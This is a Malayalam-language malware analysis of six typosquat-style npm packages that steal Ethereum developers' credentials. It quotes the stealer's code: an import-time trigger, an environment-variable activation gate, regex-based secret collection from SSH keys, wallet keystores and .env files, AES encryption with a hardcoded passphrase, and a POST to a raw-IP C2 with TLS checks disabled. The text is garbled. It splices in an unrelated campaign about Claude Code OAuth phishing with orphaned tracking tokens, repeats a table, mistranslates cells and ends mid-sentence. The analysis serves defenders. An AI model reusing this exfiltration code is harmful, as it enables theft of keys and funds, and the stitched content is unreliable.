അച്ചു ഡി.ആർ.
2026 മെയ് 6-ന്, ഒരൊറ്റ npm പ്രസാധകൻ, namikazesarada010206, Ethereum, Solidity, DeFi ഡെവലപ്പർ ഇക്കോസിസ്റ്റം എന്നിവയെ ലക്ഷ്യം വച്ചുള്ള ആറ് ക്ഷുദ്ര പാക്കേജുകൾ മുന്നോട്ട് വച്ചു.
പാക്കേജുകൾ, viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utils, ഒപ്പം web3-utils-core, ജനപ്രിയ Web3 ടൂളിംഗിനായി സഹായ ലൈബ്രറികൾ പോലെ തോന്നിക്കാൻ രൂപകൽപ്പന ചെയ്ത വിശ്വസനീയമായ പേരുകൾ ഉപയോഗിച്ചു.
ആറ് പാക്കേജുകളിലും ഒരേ കാര്യം തന്നെയായിരുന്നു ഉണ്ടായിരുന്നത് telemetry.js ഫയൽ. ക്ലസ്റ്ററിലുടനീളം ഫയൽ ബൈറ്റ്-സമാനമായിരുന്നു, SHA-256:
ഇൻസ്റ്റാൾ ചെയ്യുന്ന സമയത്ത് മാൽവെയർ പ്രവർത്തിക്കുന്നില്ല. ഇല്ല preinstall or postinstall ഹുക്ക്. പകരം, പാക്കേജ് ഇറക്കുമതി ചെയ്യുമ്പോൾ അത് സജീവമാകുന്നു. require().
ആ വിശദാംശം പ്രധാനമാണ്.
ഒരു ഡെവലപ്പർ പാക്കേജ് യഥാർത്ഥത്തിൽ ഉപയോഗിക്കുന്നതുവരെ ഇംപ്ലാന്റ് കാത്തിരിക്കുന്നു. തുടർന്ന് വർക്ക്സ്റ്റേഷൻ ഒരു യഥാർത്ഥ Ethereum / Solidity വികസന പരിസ്ഥിതി പോലെയാണോ കാണപ്പെടുന്നതെന്ന് അത് പരിശോധിക്കുന്നു. ഇത് ആൽക്കെമി അല്ലെങ്കിൽ ഇൻഫുറ കീകൾ, സ്വകാര്യ കീകൾ, മെമ്മോണിക്സ്, ഡിപ്ലോയർ കീകൾ അല്ലെങ്കിൽ ഒരു പ്രാദേശിക ഫൗണ്ടറി ഡയറക്ടറി എന്നിവയ്ക്കായി തിരയുന്നു.
ഹോസ്റ്റ് പൊരുത്തപ്പെടുന്നുവെങ്കിൽ, സ്റ്റീലർ SSH സ്വകാര്യ കീകൾ, ഫൗണ്ടറി / ഗെത്ത് / ബ്രൗണി വാലറ്റ് കീസ്റ്റോറുകൾ എന്നിവ ശേഖരിക്കുന്നു, .env* ഫയലുകളും സെൻസിറ്റീവ് എൻവയോൺമെന്റ് വേരിയബിളുകളും. ഇത് ഒരു ഹാർഡ്കോഡ് ചെയ്ത പാസ്ഫ്രെയ്സ് ഉപയോഗിച്ച് AES-256-GCM ഉപയോഗിച്ച് ബണ്ടിൽ എൻക്രിപ്റ്റ് ചെയ്യുകയും TLS പരിശോധന പ്രവർത്തനരഹിതമാക്കിയ ഒരു റോ IPv4 C2 എൻഡ്പോയിന്റിലേക്ക് എക്സ്ഫിൽട്രേറ്റ് ചെയ്യുകയും ചെയ്യുന്നു.
സൈജെനിയുടെ മാൽവെയർ ഏർലി വാണിംഗ് (MEW) സിസ്റ്റം ആറ് പാക്കേജുകളും ക്ഷുദ്രകരമാണെന്ന് സ്ഥിരീകരിച്ചു. npm രജിസ്ട്രി നീക്കം ചെയ്യൽ റിപ്പോർട്ട് ബണ്ടിൽ തീർപ്പുകൽപ്പിച്ചിട്ടില്ല.
ക്ലസ്റ്റർ: ആറ് പാക്കേജുകൾ, ഒരു പ്രസാധകൻ
പ്രസാധക അക്കൗണ്ട് namikazesarada010206 സ്ഥിരീകരിക്കാത്ത Gmail വിലാസവുമായി ലിങ്ക് ചെയ്തു namikazesarada010206@gmail.com.
2026 മെയ് 6-ന് ഒരു ദിവസത്തെ പ്രസിദ്ധീകരണ ബർസ്റ്റായി കാമ്പെയ്ൻ പ്രത്യക്ഷപ്പെട്ടു. ആറ് പാക്കേജുകളും ഇങ്ങനെ പതിപ്പിക്കപ്പെട്ടു 1.0.0, റൺടൈം ഡിപൻഡൻസികൾ പൂജ്യം ആയിരുന്നു, മൂന്ന് ഫയലുകൾ മാത്രമേ ഷിപ്പ് ചെയ്തിട്ടുള്ളൂ:
package.json index.js telemetry.js അവർ അതേ ഉറവിട ശേഖരണവും പ്രഖ്യാപിച്ചു:
https://github.com/harunosakura030303-maker/evmchain-config ആദ്യ പ്രസിദ്ധീകരണത്തിൽ തന്നെ ആദ്യത്തെ മൂന്ന് പാക്കേജുകൾ MEW സ്കാനറുകൾ പിടിച്ചെടുത്തു. പ്രസാധകന്റെ npm പ്രൊഫൈലിന്റെ വിശകലന അവലോകനത്തിന് ശേഷം ബാക്കിയുള്ള മൂന്നെണ്ണം നിർബന്ധിതമായി ഫ്ലാഗ് ചെയ്തു. ഒരിക്കൽ ഒരേ ബൈറ്റ്-സമാനമായിരുന്നു telemetry.js ക്ലസ്റ്ററിലുടനീളം സ്ഥിരീകരിച്ചെങ്കിലും, സ്ഥിരതയാൽ അവ ക്ഷുദ്രകരമായി അടച്ചു.
| പാക്കേജ് | പതിപ്പ് | npm പ്രസിദ്ധീകരിച്ചു | MEW ടിക്കറ്റ് | കോടതിവിധി |
|---|---|---|---|---|
| വീം-കോർ | 1.0.0 | 2026-05-06 01:38:44Z | #51049 | ക്ഷുഭിതൻ |
| viem-utils-core - ക്ലൗഡിൽ ഓൺലൈനിൽ | 1.0.0 | 2026-05-06 | #51050 | ക്ഷുഭിതൻ |
| ഹാർഡ്ഹാറ്റ്-കോർ-യൂട്ടിലുകൾ | 1.0.0 | 2026-05-06 | #51051 | ക്ഷുഭിതൻ |
| evm-utils (എവിഎം-യൂട്ടിലുകൾ) | 1.0.0 | 2026-05-06 | #51069 | സ്ഥിരതയാൽ, ദോഷകരം |
| ഫൗണ്ടറി-യൂട്ടിലിസ് | 1.0.0 | 2026-05-06 | #51071 | സ്ഥിരതയാൽ, ദോഷകരം |
| വെബ്3-യൂട്ടിലിസ്-കോർ | 1.0.0 | 2026-05-06 | #51070 | സ്ഥിരതയാൽ, ദോഷകരം |
പേരിടൽ തന്ത്രം ലളിതമാണ്, പക്ഷേ ഫലപ്രദമാണ്.
ഈ പാക്കേജുകൾ കൃത്യമായ അപ്സ്ട്രീം പേരുകൾ അനുകരിക്കുന്നില്ല. പകരം, അവ വിശ്വസനീയമായ "യൂട്ടിലിറ്റി" പ്രത്യയങ്ങൾ ഉപയോഗിക്കുന്നു, ഉദാഹരണത്തിന് -core, -utils, ഒപ്പം -utils-core. വെബ്3 ടൂളിംഗിന് സമീപം ഒരു ഡെവലപ്പർ പ്രതീക്ഷിക്കുന്ന കമ്പാനിയൻ ലൈബ്രറികൾ പോലെയാണ് അവയെ തോന്നിപ്പിക്കുന്നത്.
| ക്ഷുദ്ര പാക്കേജ് | നിയമാനുസൃത ലക്ഷ്യം |
|---|---|
| വീം-കോർ | viem, ഒരു ജനപ്രിയ Ethereum ടൈപ്പ്സ്ക്രിപ്റ്റ് ക്ലയന്റ് |
| viem-utils-core - ക്ലൗഡിൽ ഓൺലൈനിൽ | വീം |
| ഹാർഡ്ഹാറ്റ്-കോർ-യൂട്ടിലുകൾ | ഹാർഡ്ഹാറ്റ്, ഒരു മുഖ്യധാരാ സോളിഡിറ്റി വികസന പരിസ്ഥിതി |
| evm-utils (എവിഎം-യൂട്ടിലുകൾ) | ജനറിക് ഇവിഎം ടൂളിംഗ് നെയിംസ്പെയ്സ് |
| ഫൗണ്ടറി-യൂട്ടിലിസ് | ഫൗണ്ടറി, ഒരു സോളിഡിറ്റി ടൂൾചെയിൻ |
| വെബ്3-യൂട്ടിലിസ്-കോർ | web3-utils, Web3.js സഹായികൾ |
ഇതാണ് "സപ്ലിമെന്റൽ പാക്കേജ്" പാറ്റേൺ: "ഞാൻ യഥാർത്ഥ പാക്കേജാണ്" എന്നല്ല, മറിച്ച് "യഥാർത്ഥ പാക്കേജിന് ചുറ്റും ന്യായമായ ഒരു സഹായിയെപ്പോലെയാണ് ഞാൻ കാണപ്പെടുന്നത്."
വേഗത്തിൽ നീങ്ങുന്ന DeFi ഡെവലപ്പർമാർക്ക്, അപകടസാധ്യത സൃഷ്ടിക്കാൻ അത് മതിയാകും.
പാക്കേജ് ഇറക്കുമതി ചെയ്യുമ്പോൾ എന്താണ് സംഭവിക്കുന്നത്
ആക്രമണ ശൃംഖല ചെറുതും, ആസൂത്രിതവും, ക്രിപ്റ്റോ-വികസന പരിതസ്ഥിതികളിൽ ശ്രദ്ധ കേന്ദ്രീകരിക്കുന്നതുമാണ്.
ഇൻസ്റ്റലേഷൻ ഹുക്ക് ഇല്ല. പകരം, ഓരോ പാക്കേജിലും ഒരു ഉൾപ്പെടുന്നു index.js അത് സ്റ്റബ് ഫംഗ്ഷണാലിറ്റി കയറ്റുമതി ചെയ്യുകയും മാലിഷ്യസ് ടെലിമെട്രി മൊഡ്യൂൾ ലോഡ് ചെയ്യുകയും ചെയ്യുന്നു.
require('./telemetry').init(); ഇതിനർത്ഥം ആദ്യ ഇറക്കുമതിയിൽ തന്നെ മാൽവെയർ സജീവമാകുന്നു എന്നാണ്.
ആക്രമണകാരിക്ക് പ്രവർത്തനപരമായി അത് ഉപയോഗപ്രദമാണ്. പല സ്കാനറുകളും സാൻഡ്ബോക്സുകളും ഇൻസ്റ്റാൾ-ടൈം സ്വഭാവത്തിൽ ശ്രദ്ധ കേന്ദ്രീകരിക്കുന്നു. ഒരു ഡെവലപ്പർ, ബിൽഡ് സ്ക്രിപ്റ്റ്, ടെസ്റ്റ് സ്യൂട്ട് അല്ലെങ്കിൽ റൺടൈം പാത്ത് എന്നിവ യഥാർത്ഥത്തിൽ ഉപയോഗിക്കുന്നതുവരെ ഈ പാക്കേജ് കാത്തിരിക്കുന്നു.
ആക്ടിവേഷൻ ഗേറ്റ്: റിയൽ വെബ്3 ഡെവലപ്പർ വർക്ക്സ്റ്റേഷനുകളിൽ മാത്രം ഫയർ
ഇംപ്ലാന്റിന്റെ ഏറ്റവും പ്രധാനപ്പെട്ട ഭാഗം ആക്ടിവേഷൻ ഗേറ്റ് ആണ്.
Ethereum / Solidity ഡെവലപ്പർ മെഷീനുകളിൽ സാധാരണയായി കാണപ്പെടുന്ന പരിസ്ഥിതി വേരിയബിളുകൾക്കായുള്ള മാൽവെയർ പരിശോധനകൾ:
const indicators = [ process.env.ALCHEMY_API_KEY, process.env.INFURA_KEY, process.env.PRIVATE_KEY, process.env.MNEMONIC, process.env.DEPLOYER_KEY, ].filter(Boolean); ഫൗണ്ടറി ഇൻസ്റ്റാൾ ചെയ്തിട്ടുണ്ടോ എന്നും ഇത് പരിശോധിക്കുന്നു:
fs.existsSync(path.join(os.homedir(), '.foundry')) രണ്ട് വ്യവസ്ഥകളും ശരിയല്ലെങ്കിൽ, ഫംഗ്ഷൻ തിരികെ വരും, ഒന്നും ചെയ്യുന്നില്ല.
ഇത് പൊതുവായ വിശകലന പരിതസ്ഥിതികളിൽ പാക്കേജിനെ കൂടുതൽ നിശബ്ദമാക്കുന്നു. ഫൗണ്ടറി, ആൽക്കെമി കീകൾ, ഇൻഫുറ കീകൾ, പ്രൈവറ്റ് കീകൾ, അല്ലെങ്കിൽ മെമ്മോണിക്സ് എന്നിവയില്ലാത്ത ഒരു സാൻഡ്ബോക്സിൽ നിരുപദ്രവകരമായ ഒരു ഇറക്കുമതി കാണാൻ കഴിയും.
പൊരുത്തപ്പെടുന്ന ഒരു ഹോസ്റ്റിൽ, മാൽവെയർ ശേഖരിക്കുന്നതിന് 60 മുതൽ 90 സെക്കൻഡ് വരെ കാത്തിരിക്കും:
setTimeout(() => { try { _collect(); } catch {} }, 60000 + Math.random() * 30000).unref(); ഈ കാലതാമസം ഇറക്കുമതിയും പുറംതള്ളലും തമ്മിലുള്ള വ്യക്തമായ ബന്ധം കുറയ്ക്കുന്നു. .unref() ഒരു ഹ്രസ്വകാല സ്ക്രിപ്റ്റിലാണ് പാക്കേജ് ഇറക്കുമതി ചെയ്തതെങ്കിൽ, കോൾ ഹോസ്റ്റ് പ്രോസസ്സിനെ സാധാരണയായി പുറത്തുകടക്കാൻ അനുവദിക്കുന്നു.
ഇത് ശബ്ദായമാനമായ അടിച്ചുപൊളിക്കൽ സ്വഭാവമല്ല. ഡെവലപ്പർ പരിതസ്ഥിതി മോഷ്ടിക്കാൻ കൊള്ളാത്ത പക്ഷം പ്രവർത്തിക്കുന്നത് ഒഴിവാക്കാൻ രൂപകൽപ്പന ചെയ്ത ഒരു ലക്ഷ്യം വച്ചുള്ള മോഷണമാണിത്.
മോഷ്ടാവ് ശേഖരിക്കുന്നത്
ആക്ടിവേഷൻ ഗേറ്റ് കടന്നുകഴിഞ്ഞാൽ, Web3 വികസനത്തിൽ ഏറ്റവും പ്രധാനപ്പെട്ട ഉറവിടങ്ങളിൽ നിന്ന് മാൽവെയർ ശേഖരിക്കുന്നു: സ്വകാര്യ കീകൾ, വാലറ്റ് കീസ്റ്റോറുകൾ, വിന്യാസ ക്രെഡൻഷ്യലുകൾ, ക്ലൗഡ് രഹസ്യങ്ങൾ, npm ടോക്കണുകൾ, പ്രാദേശിക പ്രോജക്റ്റ് കോൺഫിഗറേഷൻ.
| ഉറവിടം | എന്താണ് ശേഖരിക്കുന്നത് |
|---|---|
| പ്രോസസ്.എൻവി | ഏതെങ്കിലും വേരിയബിൾ പൊരുത്തപ്പെടുത്തൽ /TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MEMEMONIC|AWS|NPM|DEPLOY/i |
| ~/.ssh/* | പൂർണ്ണ ഫയൽ ഉള്ളടക്കം ഉൾപ്പെടെ, PRIVATE KEY അല്ലെങ്കിൽ BEGIN OPENSSH അടങ്ങിയിരിക്കുന്ന ഫയലുകൾ |
| ~/.ഫൗണ്ടറി/കീസ്റ്റോറുകൾ/* | ഫൗണ്ടറി വാലറ്റ് കീസ്റ്റോർ ഫയലുകൾ |
| ~/.എതെറിയം/കീസ്റ്റോർ/* | ഗെത്ത് വാലറ്റ് കീസ്റ്റോർ ഫയലുകൾ |
| ~/.ബ്രൗണി/അക്കൗണ്ടുകൾ/* | ബ്രൗണി വാലറ്റ് കീസ്റ്റോർ ഫയലുകൾ |
| ${cwd}/.env | പൂർണ്ണ ഫയൽ ഉള്ളടക്കം |
| ${cwd}/.env.ലോക്കൽ | പൂർണ്ണ ഫയൽ ഉള്ളടക്കം |
| ${cwd}/.env.പ്രൊഡക്ഷൻ | പൂർണ്ണ ഫയൽ ഉള്ളടക്കം |
| ${cwd}/.env.development | പൂർണ്ണ ഫയൽ ഉള്ളടക്കം |
| os.ഹോസ്റ്റ്നെയിം() | ഹോസ്റ്റ് മെറ്റാഡാറ്റ |
| ക്രിപ്റ്റോ.റാൻഡംയുയുഐഡി() | ഇര/സെഷൻ ഐഡന്റിഫയർ |
| തീയതി.ഇപ്പോൾ() | ശേഖരണ ടൈംസ്റ്റാമ്പ് |
otheve.beacon.qq.com oth.str.beacon.qq.com h.trace.qq.com ATTA ടോക്കണുകൾ ഇവയാണ്:
ATTA_ID 00400014144 ATTA_TOKEN 6478159937 ടെലിമെട്രി ഓപ്പറേറ്ററുടെ സ്വന്തം അനലിറ്റിക്സാണോ അതോ പ്രത്യേകം ധനസമ്പാദനം നടത്തിയ ചാനലാണോ എന്ന് സ്ഥിരീകരിക്കാൻ ഞങ്ങൾക്ക് കഴിഞ്ഞിട്ടില്ല. ഞങ്ങൾ പരിശോധിച്ച രണ്ട് സാമ്പിളുകളിലും ATTA ടോക്കണുകൾ ഒന്നുതന്നെയാണ്.
ക്ലസ്റ്റർ ബി: ഹെയ്ബായ്
claude.hk OAuth ഫിഷിംഗ് + ANTHROPIC_BASE_URL ഹൈജാക്ക്
ഏപ്രിൽ 1 ലെ സാമ്പിൾ പ്രചാരണത്തിന്റെ ഏറ്റവും പരുക്കൻ, മുൻകാല ശാഖയാണ്.
heibai:2.1.88-claude.hk-4 പ്രസിദ്ധീകരിച്ചത് wuguoqiangvip28, 2025 ജൂൺ 7-ന് സൃഷ്ടിച്ച ഒരു അക്കൗണ്ട്. പാക്കേജ് നിയമാനുസൃതമായതിന് വിരുദ്ധമായി വ്യക്തമായി പതിപ്പ് ചെയ്തു. 2.1.88 ആന്ത്രോപിക് റിലീസ്.
ഇത് CA-cert MITM നെ ബാധിക്കുന്നില്ല. പകരം, OAuth എൻഡ്പോയിന്റിനെക്കുറിച്ച് ഉപയോക്താവിനോട് കള്ളം പറയുന്നു.
ചോർന്ന ക്ലോഡ് കോഡ് ഉറവിടത്തിന് മുകളിലുള്ള ക്ഷുദ്രകരമായ കൂട്ടിച്ചേർക്കലുകളിൽ ഇവ ഉൾപ്പെടുന്നു:
| ഉറവിടം | എന്താണ് ശേഖരിക്കുന്നത് |
|---|---|
| പ്രോസസ്.എൻവി | ഏതെങ്കിലും വേരിയബിൾ പൊരുത്തപ്പെടുത്തൽ /TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MEMEMONIC|AWS|NPM|DEPLOY/i |
| ~/.ssh/* | പൂർണ്ണ ഫയൽ ഉള്ളടക്കം ഉൾപ്പെടെ, PRIVATE KEY അല്ലെങ്കിൽ BEGIN OPENSSH അടങ്ങിയിരിക്കുന്ന ഫയലുകൾ |
| ~/.ഫൗണ്ടറി/കീസ്റ്റോറുകൾ/* | ഫൗണ്ടറി വാലറ്റ് കീസ്റ്റോർ ഫയലുകൾ |
| ~/.എതെറിയം/കീസ്റ്റോർ/* | ഗെത്ത് വാലറ്റ് കീസ്റ്റോർ ഫയലുകൾ |
| ~/.ബ്രൗണി/അക്കൗണ്ടുകൾ/* | ബ്രൗണി വാലറ്റ് കീസ്റ്റോർ ഫയലുകൾ |
| ${cwd}/.env | പൂർണ്ണ ഫയൽ ഉള്ളടക്കം |
| ${cwd}/.env.ലോക്കൽ | പൂർണ്ണ ഫയൽ ഉള്ളടക്കം |
| ${cwd}/.env.പ്രൊഡക്ഷൻ | പൂർണ്ണ ഫയൽ ഉള്ളടക്കം |
| ${cwd}/.env.development | പൂർണ്ണ ഫയൽ ഉള്ളടക്കം |
| os.ഹോസ്റ്റ്നെയിം() | ഹോസ്റ്റ് മെറ്റാഡാറ്റ |
| ക്രിപ്റ്റോ.റാൻഡംയുയുഐഡി() | ഇര/സെഷൻ ഐഡന്റിഫയർ |
| തീയതി.ഇപ്പോൾ() | ശേഖരണ ടൈംസ്റ്റാമ്പ് |
ലക്ഷ്യ പട്ടിക വളരെ നിർദ്ദിഷ്ടമാണ്. ഇത് പൊതുവായ ബ്രൗസർ മോഷണമോ വിശാലമായ ക്രെഡൻഷ്യൽ സ്ക്രാപ്പിംഗോ അല്ല. Ethereum ആപ്ലിക്കേഷനുകൾ നിർമ്മിക്കുകയോ പരീക്ഷിക്കുകയോ വിന്യസിക്കുകയോ പ്രവർത്തിപ്പിക്കുകയോ ചെയ്യുന്ന ഡെവലപ്പർമാരെ ലക്ഷ്യമിട്ടുള്ളതാണ് ഇത്.
ഫൗണ്ടറി, ഗെത്ത്, ബ്രൗണി കീസ്റ്റോറുകൾ എന്നിവ ഉൾപ്പെടുത്തേണ്ടത് വളരെ പ്രധാനമാണ്. ഈ ഫയലുകൾക്ക് വാലറ്റുകളിലേക്കോ വിന്യാസ ഐഡന്റിറ്റികളിലേക്കോ നേരിട്ടുള്ള ആക്സസ് പ്രതിനിധീകരിക്കാൻ കഴിയും. ആക്രമണകാരിക്ക് അവയെ പാസ്വേഡുകൾ, ഓർമ്മക്കുറിപ്പുകൾ അല്ലെങ്കിൽ പരിസ്ഥിതി രഹസ്യങ്ങൾ എന്നിവയുമായി ജോടിയാക്കാൻ കഴിയുമെങ്കിൽ, അവർക്ക് ഫണ്ടുകൾ നീക്കാനോ, വിന്യാസകരെ അനുകരിക്കാനോ, സ്മാർട്ട് കോൺട്രാക്റ്റ് പ്രവർത്തനങ്ങളിൽ വിട്ടുവീഴ്ച ചെയ്യാനോ കഴിഞ്ഞേക്കും.
പുറംതള്ളലിന് മുമ്പുള്ള എൻക്രിപ്ഷൻ
ശേഖരിച്ച ഡാറ്റ മാൽവെയർ അയയ്ക്കുന്നതിന് മുമ്പ് എൻക്രിപ്റ്റ് ചെയ്യുന്നു.
const key = crypto.createHash('sha256').update(K).digest(); const iv = crypto.randomBytes(12); const cipher = crypto.createCipheriv('aes-256-gcm', key, iv); ഹാർഡ്കോഡ് ചെയ്ത പാസ്ഫ്രെയ്സ് ഇതാണ്:
a]3Fk9$mP2xL7vQ8nR4wJ6yB0tH5cE1d അന്തിമ പേലോഡ് JSON ആയി പൊതിഞ്ഞിരിക്കുന്നു:
{"v":2,"iv":"<base64>","d":"<base64-ciphertext>","t":"<base64-gcm-tag>"} എൻക്രിപ്ഷൻ മാൽവെയറിനെ സ്വയം കൂടുതൽ വിപുലമാക്കുന്നില്ല. എന്നിരുന്നാലും, ഇത് നെറ്റ്വർക്ക് പരിശോധനയെ കൂടുതൽ ബുദ്ധിമുട്ടാക്കുന്നു. പുറത്തേക്കുള്ള വഴി നിരീക്ഷിക്കുന്ന ഒരു ഡിഫൻഡർക്ക് ഒരു JSON പേലോഡ് കാണാൻ കഴിയും, പക്ഷേ മോഷ്ടിച്ച കീകൾ, വാലറ്റ് ഫയലുകൾ അല്ലെങ്കിൽ .env ഹാർഡ്കോഡ് ചെയ്ത പാസ്ഫ്രെയ്സും ഡീക്രിപ്ഷൻ ലോജിക്കും ഇല്ലാത്ത ഉള്ളടക്കങ്ങൾ.
ഒരു റോ IPv4 C2 ലേക്കുള്ള എക്സ്ഫിൽട്രേഷൻ
എക്സ്ഫിൽട്രേഷൻ പാത്ത് ഹാർഡ്കോഡ് ചെയ്തിരിക്കുന്നു:
const req = https.request({ hostname: '76.13.37.80', port: 8443, path: '/api/v1/telemetry', method: 'POST', headers: { 'Content-Type': 'application/json', ... }, rejectUnauthorized: false, timeout: 8000, }, () => {}); മാൽവെയർ ഡാറ്റ ഇതിലേക്ക് അയയ്ക്കുന്നു:
https://76.13.37.80:8443/api/v1/telemetry രണ്ട് വിശദാംശങ്ങൾ വേറിട്ടുനിൽക്കുന്നു.
ഒന്നാമതായി, C2 ഒരു ഡൊമെയ്നല്ല, മറിച്ച് ഒരു റോ IPv4 വിലാസമാണ്. ഇത് ഡൊമെയ്ൻ രജിസ്ട്രേഷന്റെ ആവശ്യകത ഇല്ലാതാക്കുകയും ചില ഡൊമെയ്ൻ അധിഷ്ഠിത കണ്ടെത്തലുകൾ ഒഴിവാക്കുകയും ചെയ്യുന്നു.
രണ്ടാമതായി, TLS പരിശോധന ഇനിപ്പറയുന്നവ ഉപയോഗിച്ച് അപ്രാപ്തമാക്കിയിരിക്കുന്നു:
rejectUnauthorized: false സ്വയം ഒപ്പിട്ട സർട്ടിഫിക്കറ്റുകൾ ഉൾപ്പെടെ ഏത് സർട്ടിഫിക്കറ്റും സ്വീകരിക്കാൻ മാൽവെയറിനെ ഇത് അനുവദിക്കുന്നു. മറ്റൊരു വിധത്തിൽ പറഞ്ഞാൽ, സാധുവായ ഒരു പൊതു സർട്ടിഫിക്കറ്റ് ആവശ്യമില്ലാതെ തന്നെ ആക്രമണകാരിക്ക് എൻക്രിപ്റ്റ് ചെയ്ത ട്രാൻസ്പോർട്ട് ലഭിക്കുന്നു.
പുനഃശ്രമ ലോജിക്കോ ഫോൾബാക്ക് ഹോസ്റ്റോ ഇല്ല. പിശകുകൾ നിശബ്ദമായി വിഴുങ്ങുന്നു. C2 ഓഫ്ലൈനിലോ എത്തിച്ചേരാനാകുന്നില്ലെങ്കിലോ ഇത് പാക്കേജിനെ നിശബ്ദമായി നിലനിർത്തുന്നു.
ഈ കാമ്പെയ്ൻ എന്തുകൊണ്ട് പ്രധാനമാണ്
ഡെവലപ്പർമാരെ ലക്ഷ്യം വച്ചുള്ള മിക്ക ക്ഷുദ്രകരമായ npm പാക്കേജുകളും വിശാലമായ ക്രെഡൻഷ്യലുകൾ പിന്തുടരുന്നു: npm ടോക്കണുകൾ, AWS കീകൾ, GitHub ടോക്കണുകൾ, അല്ലെങ്കിൽ .npmrc ഫയലുകൾ.
ഈ പ്രചാരണം ലക്ഷ്യത്തെ ചുരുക്കുന്നു.
മെഷീൻ ഒരു Ethereum അല്ലെങ്കിൽ Solidity ഡെവലപ്പറുടെതാണെന്നതിന്റെ സൂചനകൾ ഇത് തിരയുന്നു. തുടർന്ന് ആ പരിതസ്ഥിതിയിൽ പ്രാധാന്യമുള്ള ആസ്തികൾ കൃത്യമായി അത് വലിച്ചെടുക്കുന്നു: വാലറ്റ് കീസ്റ്റോറുകൾ, സ്വകാര്യ കീകൾ, മെമ്മോണിക്സ്, ഡിപ്ലോയർ കീകൾ, .env ഫയലുകൾ, SSH കീകൾ എന്നിവ.
അത് Web3 ടീമുകൾക്ക് ഒരു സാധാരണ npm സ്റ്റീലറിനേക്കാൾ അപകടകരമാക്കുന്നു.
വിജയകരമായ ഒരു അണുബാധ ഇനിപ്പറയുന്നവ വെളിപ്പെടുത്തിയേക്കാം:
- വിന്യാസ വാലറ്റുകൾ
- സ്മാർട്ട് കോൺട്രാക്റ്റ് അഡ്മിൻ കീകൾ
- ആർപിസി ദാതാവിന്റെ കീകൾ
- ക്ലൗഡ് വിന്യാസ ക്രെഡൻഷ്യലുകൾ
- npm പബ്ലിഷിംഗ് ടോക്കണുകൾ
- ഡെവലപ്പർ അല്ലെങ്കിൽ ബിൽഡ് ഇൻഫ്രാസ്ട്രക്ചറിലേക്കുള്ള SSH ആക്സസ്
- സൂക്ഷിച്ചിരിക്കുന്ന പ്രോജക്റ്റ് രഹസ്യങ്ങൾ
.envഫയലുകൾ - ഫൗണ്ടറി, ഗെത്ത്, അല്ലെങ്കിൽ ബ്രൗണി എന്നിവയ്ക്കുള്ള വാലറ്റ് കീസ്റ്റോറുകൾ
പാക്കേജ് പേരുകൾ വ്യക്തമായ സോഷ്യൽ എഞ്ചിനീയറിംഗും കാണിക്കുന്നു. പരിചിതമായ ഉപകരണ നാമങ്ങളിലൂടെ അവ Web3 ഡെവലപ്പർ ഇക്കോസിസ്റ്റത്തെ ലക്ഷ്യമിടുന്നു: viem, hardhat, foundry, evm, ഒപ്പം web3.
യഥാർത്ഥ പ്രോജക്ടുകളിൽ വിട്ടുവീഴ്ച ചെയ്യേണ്ട ആവശ്യമില്ല. ന്യായമായ ഒരു കമ്പാനിയൻ പാക്കേജ് പോലെ തോന്നിക്കുന്ന ഒന്ന് ഇൻസ്റ്റാൾ ചെയ്യാൻ അവർക്ക് ഒരു ഡെവലപ്പർ മാത്രമേ ആവശ്യമുള്ളൂ.
വിട്ടുവീഴ്ചയുടെയും കണ്ടെത്തലിന്റെയും സൂചകങ്ങൾ
| പാക്കേജുകളും പ്രസാധകരും | |
|---|---|
| ഫീൽഡ് | വില |
| എൻപിഎം പ്രസാധകൻ | നമികാസെസരദ010206 |
| പ്രസാധക ഇമെയിൽ | namikazesarada010206@gmail.com |
| ഇമെയിൽ പരിശോധിച്ചു | ഇല്ല |
| SCM പരിശോധിച്ചു | ഇല്ല |
| മതിപ്പ് സ്കോർ | 1.0 |
| പാക്കേജുകൾ | viem-core, viem-utils-core, hardhat-core-utils, evm-utils, Foundry-utils, web3-utils-core |
| പതിപ്പുകൾ | എല്ലാം 1.0.0 |
| ഉറവിട ശേഖരം | https://github.com/harunosakura030303-maker/evmchain-config |
| സ്ഥിരീകരിച്ച ദോഷകരമായത് | ആറ് പാക്കേജുകളും |
| നെറ്റ്വർക്ക് | |
|---|---|
| ടൈപ്പ് ചെയ്യുക | വില |
| C2 എൻഡ്പോയിന്റ് | https://76.13.37.80:8443/api/v1/telemetry |
| സി2 ഐപി | 76.13.37.80 |
| C2 പോർട്ട് | 8443/ടിസിപി |
| TLS സ്വഭാവം | അംഗീകാരമില്ലാത്തത് നിരസിക്കുക: തെറ്റ് |
| പേലോഡ് സ്കീമ | {"v":2,"iv": ,"ഡി": ,"ടി": } |
| ഫയലുകളും ഹാഷുകളും | |
|---|---|
| ടൈപ്പ് ചെയ്യുക | വില |
| telemetry.js SHA-256 | 71426e93cb6143052d5aeeca920850f8a0343c95bc65aab9a15145848cc5bff1 |
| പാക്കേജ് ലേഔട്ട് | പാക്കേജ്.ജെസൺ, ഇൻഡെക്സ്.ജെഎസ്, ടെലിമെട്രി.ജെഎസ് |
| ഫയലുകളുടെ എണ്ണം | 3 |
| ഏകദേശ ആകെ വലുപ്പം | 3.4 കെ.ബി. |
സജീവമാക്കൽ സിഗ്നലുകൾ
ഈ പരിസ്ഥിതി വേരിയബിളുകൾക്കായി മാൽവെയർ പരിശോധിക്കുന്നു:
ALCHEMY_API_KEY INFURA_KEY PRIVATE_KEY MNEMONIC DEPLOYER_KEY ഇത് ഇവയും പരിശോധിക്കുന്നു:
~/.foundry/ ടാർഗെറ്റുചെയ്ത ഹോസ്റ്റ് പാത്തുകൾ
~/.ssh/* ~/.foundry/keystores/* ~/.ethereum/keystore/* ~/.brownie/accounts/* ${cwd}/.env ${cwd}/.env.local ${cwd}/.env.production ${cwd}/.env.development ശേഖരം റെജക്സ്
/TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i കണ്ടെത്തൽ കുറിപ്പുകൾ
പൂർണ്ണമായ പെരുമാറ്റ വിശകലനം ആവശ്യമില്ലാതെ തന്നെ നിരവധി നിയമങ്ങൾ ഈ കാമ്പെയ്നിനെ പിന്തുടരുന്നു.
ആദ്യം, ആറ് ക്ഷുദ്ര പാക്കേജ് നാമങ്ങൾക്കായി ലോക്ക് ഫയലുകൾ സ്കാൻ ചെയ്യുക:
